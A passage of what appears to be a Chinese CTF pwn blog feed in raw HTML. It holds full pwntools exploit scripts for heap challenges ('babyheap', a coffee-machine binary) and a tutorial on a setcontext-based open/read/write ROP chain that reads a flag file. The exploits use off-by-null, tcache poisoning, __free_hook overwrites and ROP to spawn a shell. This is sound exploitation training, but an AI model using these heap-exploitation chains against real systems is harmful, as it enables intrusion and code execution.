class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./babyheap"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.38-1ubuntu6_amd64/libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(12),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def menu(opt):<br> sla(<span class="hljs-string">'>>'</span>,str(opt))<br> # sl(str(opt))<br><br>def <span class="hljs-built_in">add</span>(size,data):<br> menu(1)<br> sla(b<span class="hljs-string">"input your name size"</span>,str(size))<br> sla(b<span class="hljs-string">"input your name"</span>,data)<br><br>def delete(index):<br> menu(4)<br> sla(b<span class="hljs-string">'input index\n'</span>,str(index))<br><br>def show(index):<br> menu(3)<br> sla(b<span class="hljs-string">'input index\n'</span>,str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,size,name):<br> menu(2)<br> sla(b<span class="hljs-string">'input index'</span>,str(index))<br> sla(b<span class="hljs-string">'input your name size'</span>,str(size))<br> sa(b<span class="hljs-string">'input your name'</span>,name)<br><br><br>ru(<span class="hljs-string">"0x"</span>)<br><span class="hljs-attribute">heapbase</span>=iuu64()-0x2a0<br>lg(<span class="hljs-string">"heapbase"</span>)<br><span class="hljs-attribute">fake_size</span>=0x1940<br><span class="hljs-attribute">fake_chunk</span>=p64(0)+p64(fake_size)+p64(heapbase+0x2c0)*2<br><br><span class="hljs-comment">#off by null</span><br><span class="hljs-built_in">add</span>(0x4f8,fake_chunk)#0<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#1<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#2<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#3<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#4<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#5<br><span class="hljs-built_in">add</span>(0x4f8,b<span class="hljs-string">'AAAA'</span>)#6<br><span class="hljs-built_in">add</span>(0x4f8,b<span class="hljs-string">'AAAA'</span>)#7<br><span class="hljs-attribute">payload</span>=b'A'*0x400+p64(fake_size)<br><span class="hljs-built_in">edit</span>(5,0x408,payload)<br>delete(6)<br><br><span class="hljs-comment">#leak libc</span><br><span class="hljs-built_in">add</span>(0x4e8,b<span class="hljs-string">'AAAA'</span>)#6<br><span class="hljs-built_in">add</span>(0x480,b<span class="hljs-string">'AAAA'</span>)#8<br><span class="hljs-built_in">add</span>(0x480,b<span class="hljs-string">'AAAA'</span>)#9<br>delete(8)<br><span class="hljs-built_in">add</span>(0x490,b<span class="hljs-string">'AAAA'</span>)#8<br>show(1)<br><span class="hljs-attribute">libcbase</span>=uu64()-0x1ff110<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">bin_sh</span>=libcbase+next(libc.search(b'/bin/sh\x00'))<br><span class="hljs-attribute">pop_rdi</span>=libcbase+0x0000000000028715<br><span class="hljs-attribute">environ</span>=libcbase+0x206258<br><span class="hljs-attribute">stdout</span>=libcbase+0x1ff7a0<br><span class="hljs-attribute">ret</span>=libcbase+0x0000000000026a3e<br><br><span class="hljs-comment">#2 attack tcache_struct</span><br>delete(2)<br>delete(3)<br><span class="hljs-attribute">payload</span>=b'A'*0x380+p64(0)+p64(0x411)+p64((heapbase+0x10)^(heapbase>>12))<br><span class="hljs-built_in">edit</span>(9,0x480,payload)<br>sl(b<span class="hljs-string">'1'</span>)<br><span class="hljs-built_in">add</span>(0x400,b<span class="hljs-string">'AAAA'</span>)#2<br><span class="hljs-attribute">payload</span>=p64(1)+p64(0)*14+p64(0x007000000000000)+p64(0x000556111e1e2a0)<br><span class="hljs-attribute">payload</span>=payload.ljust(0x278,b'\x00')+p64(stdout)<br><span class="hljs-built_in">add</span>(0x400,payload)#3<br><br><span class="hljs-comment">#leak stack</span><br><span class="hljs-attribute">payload</span>=p64(0xfbad1800)+p64(0)*3+p64(environ)+p64(environ+8)*4<br><span class="hljs-built_in">add</span>(0x400,payload)<br><span class="hljs-attribute">stack</span>=uu64()<br>lg(<span class="hljs-string">"stack"</span>)<br><span class="hljs-attribute">ret_addr</span>=stack-0x120<br>lg(<span class="hljs-string">"ret_addr"</span>)<br><br><span class="hljs-attribute">payload</span>=p64(1)+p64(0)*14+p64(0x007000000000000) + p64(0x0000556111e1e2a0)<br><span class="hljs-attribute">payload</span>=payload.ljust(0x278,b'\x00')+p64(ret_addr-8)<br><span class="hljs-built_in">edit</span>(3,0x380,payload)<br><br><span class="hljs-attribute">payload1</span>=p64(0)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>sl(b<span class="hljs-string">'1'</span>)<br><span class="hljs-built_in">add</span>(0x400,payload1)<br><br>menu(5)<br>ia()<br></code></pre></td></tr></table></figure><h1 id="atuo-coffee-sale-machine"><a href="#atuo-coffee-sale-machine" class="headerlink" title="atuo_coffee_sale_machine"></a>atuo_coffee_sale_machine</h1><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br>libc=ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6"</span>)<br>ip = <span class="hljs-string">'172.10.0.9'</span><br>port = <span class="hljs-number">8888</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">cmd</span>(<span class="hljs-params">choice</span>):<br>ru(<span class="hljs-string">">>>"</span>)<br>sl(<span class="hljs-built_in">str</span>(choice))<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sell</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>,flag=<span class="hljs-number">0</span>,content=<span class="hljs-string">'youlin'</span></span>):<br>cmd(<span class="hljs-number">1</span>)<br>sla(<span class="hljs-string">'want to buy\n'</span>, <span class="hljs-built_in">str</span>(<span class="hljs-built_in">id</span>))<br><span class="hljs-keyword">if</span> flag:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'Y'</span>)<br>sa(<span class="hljs-string">'need in coffee\n'</span>, content)<br><span class="hljs-keyword">else</span>:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'N'</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">buy</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>, flag=<span class="hljs-number">0</span>, content=<span class="hljs-string">'youlin'</span></span>):<br>cmd(<span class="hljs-number">1</span>)<br>sla(<span class="hljs-string">'want to buy\n'</span>, <span class="hljs-built_in">str</span>(<span class="hljs-built_in">id</span>))<br><span class="hljs-keyword">if</span> flag:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'Y'</span>)<br>sa(<span class="hljs-string">'need in coffee\n'</span>, content)<br><span class="hljs-keyword">else</span>:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'N'</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">admin</span>():<br>cmd(<span class="hljs-number">4421</span>)<br>sa(<span class="hljs-string">'admin password\n'</span>, <span class="hljs-string">b'just pwn it'</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">back</span>():<br>cmd(<span class="hljs-number">3</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">replenish</span>(<span class="hljs-params"><span class="hljs-built_in">id</span></span>):<br>admin()<br>cmd(<span class="hljs-number">1</span>)<br>cmd(<span class="hljs-built_in">id</span>)<br>back()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">change</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>, coffee, content</span>):<br>admin()<br>cmd(<span class="hljs-number">2</span>)<br>cmd(<span class="hljs-built_in">id</span>)<br>cmd(coffee)<br>sa(<span class="hljs-string">'your content\n'</span>, content)<br>back()<br><br>buy(<span class="hljs-number">1</span>)<br>buy(<span class="hljs-number">1</span>)<br>change(<span class="hljs-number">1</span>, <span class="hljs-number">2</span>, p64(<span class="hljs-number">0x4062F0</span>))<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>buy(<span class="hljs-number">2</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>replenish(<span class="hljs-number">2</span>)<br>change(<span class="hljs-number">2</span>, <span class="hljs-number">7</span>, p64(<span class="hljs-number">0x406068</span>))<br>cmd(<span class="hljs-number">1</span>)<br>libc_base = uu64() - libc.sym[<span class="hljs-string">'atol'</span>]<br>lg(<span class="hljs-string">'libc_base'</span>)<br><br>sla(<span class="hljs-string">'want to buy\n'</span>, <span class="hljs-string">b'2'</span>)<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'N'</span>)<br>buy(<span class="hljs-number">2</span>)<br>change(<span class="hljs-number">2</span>, <span class="hljs-number">2</span>, p64(libc_base + libc.sym[<span class="hljs-string">'__free_hook'</span>] - <span class="hljs-number">8</span>))<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>sell(<span class="hljs-number">3</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>replenish(<span class="hljs-number">3</span>)<br>change(<span class="hljs-number">3</span>, <span class="hljs-number">7</span>, p64(<span class="hljs-number">0</span>) + p64(libc_base + libc.sym[<span class="hljs-string">'system'</span>]))<br>buy(<span class="hljs-number">3</span>, <span class="hljs-number">1</span>, <span class="hljs-string">b'/bin/sh'</span>)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>orw_heap</title>
<link href="/2023/10/24/orw-heap/"/>
<url>/2023/10/24/orw-heap/</url>
<content type="html"><![CDATA[<p>又是查缺补漏的一篇文章,由于之前学堆在学习完了一些基础的知识之后直接去看house of banana了,这里不得不感慨banana的强大,其实很多堆题都是可以利用banana的利用链去做的(包括orw)所以就没有仔细的学习setcontext的利用手法,只是大概知道有这么个东西。但是培训的时候客户有问这个也就仔细去学习了一下(感谢on3师傅的帮助)</p><h1 id="setcontext介绍"><a href="#setcontext介绍" class="headerlink" title="setcontext介绍"></a>setcontext介绍</h1><p>主要是利用setcontext+53的这段gadget,通过控制rsp来控制程序的返回地址,即通过控制rdi+0xa0处的地址来控制rsp</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241932248.png" alt="image-20231024193237139"></p><h2 id="2-27利用方法"><a href="#2-27利用方法" class="headerlink" title="2.27利用方法"></a>2.27利用方法</h2><p>将free_hook修改为setcontext,并在堆块上布置orw链,以及堆块地址+0xa0处写上orw的地址,+0xa8处写上ret的地址,即可执行orw</p><h1 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h1><p>链接:<a href="https://pan.baidu.com/s/1Pnl09FAe6OofcRl5GicoOA?pwd=p87w">https://pan.baidu.com/s/1Pnl09FAe6OofcRl5GicoOA?pwd=p87w</a> </p><p>简单的分析一下题目,可以看到题目开了沙箱</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241940969.png" alt="image-20231024194007909"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241940179.png" alt="image-20231024194033136"></p><p>并且程序本身有uaf</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241941385.png" alt="image-20231024194107350"></p><p>因此确定利用思路为先泄露libc然后将free_hook修改为setcontext并在堆块上布置好orw链</p><p>先泄露libc并计算出需要用到的一些gadget</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x410,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x10,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">1</span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">0</span>)</span></span><br><span class="hljs-function"><span class="hljs-title">show</span><span class="hljs-params">(<span class="hljs-number">0</span>)</span></span><br>libcbase=<span class="hljs-built_in">uu64</span>()-<span class="hljs-number">0</span>x3ebca0<br><span class="hljs-function"><span class="hljs-title">lg</span><span class="hljs-params">(<span class="hljs-string">"libcbase"</span>)</span></span><br>malloc_hook=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'__malloc_hook'</span>]</span><br>free_hook=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'__free_hook'</span>]</span><br>setcontext=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'setcontext'</span>]</span>+<span class="hljs-number">53</span><br>pop_rdi=<span class="hljs-number">0</span>x000000000002164f+libcbase<br>pop_rsi=<span class="hljs-number">0</span>x0000000000023a6a+libcbase<br>pop_rdx=<span class="hljs-number">0</span>x0000000000001b96+libcbase<br>ret=libcbase+<span class="hljs-number">0</span>x00000000000008aa<br><br>open=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'open'</span>]</span><br>read=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'read'</span>]</span><br>write=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'write'</span>]</span><br></code></pre></td></tr></table></figure><p>泄露堆地址并修改free_hook为setcontext</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x410,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">2</span><br><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x60,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">3</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x70,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">4</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x70,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">5</span><br><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">3</span>)</span></span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">4</span>)</span></span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">5</span>)</span></span><br><br><span class="hljs-function"><span class="hljs-title">show</span><span class="hljs-params">(<span class="hljs-number">5</span>)</span></span><br>heapbase=<span class="hljs-built_in">uheap</span>()-<span class="hljs-number">0</span>x710<br><span class="hljs-function"><span class="hljs-title">lg</span><span class="hljs-params">(<span class="hljs-string">"heapbase"</span>)</span></span><br><br><span class="hljs-function"><span class="hljs-title">edit</span><span class="hljs-params">(<span class="hljs-number">3</span>,p64(free_hook)</span></span>)<br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x60,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">6</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x60,p64(setcontext)</span></span>)#<span class="hljs-number">7</span><br></code></pre></td></tr></table></figure><p>布置orw链,并通过free对应的堆块使得rdi指向堆上的地址从而控制程序执行orw</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs stylus">heap=heapbase+<span class="hljs-number">0</span>x260<br>flag_addr=heap+<span class="hljs-number">0</span>x300<br>orw_addr=heap+<span class="hljs-number">0</span>xb0<br>orw=<span class="hljs-built_in">p64</span>(pop_rdi)+<span class="hljs-built_in">p64</span>(heap)+<span class="hljs-built_in">p64</span>(pop_rsi)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(open)<br>orw+=<span class="hljs-built_in">p64</span>(pop_rdi)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">3</span>)+<span class="hljs-built_in">p64</span>(pop_rsi)+<span class="hljs-built_in">p64</span>(flag_addr)+<span class="hljs-built_in">p64</span>(pop_rdx)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x50)+<span class="hljs-built_in">p64</span>(read)<br>orw+=<span class="hljs-built_in">p64</span>(pop_rdi)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)+<span class="hljs-built_in">p64</span>(pop_rsi)+<span class="hljs-built_in">p64</span>(flag_addr)+<span class="hljs-built_in">p64</span>(pop_rdx)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x50)+<span class="hljs-built_in">p64</span>(write)<br>payload=b<span class="hljs-string">'./flag\x00'</span><span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xa0,b<span class="hljs-string">'\x00'</span>)<br>payload+=<span class="hljs-built_in">p64</span>(orw_addr)+<span class="hljs-built_in">p64</span>(ret)+orw<br><br><span class="hljs-function"><span class="hljs-title">edit</span><span class="hljs-params">(<span class="hljs-number">2</span>,payload)</span></span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">2</span>)</span></span><br><br><span class="hljs-function"><span class="hljs-title">ia</span><span class="hljs-params">()</span></span><br></code></pre></td></tr></table></figure><p>完整exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./orw_h1"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-attribute">libc</span>=ELF("/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6")<span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span 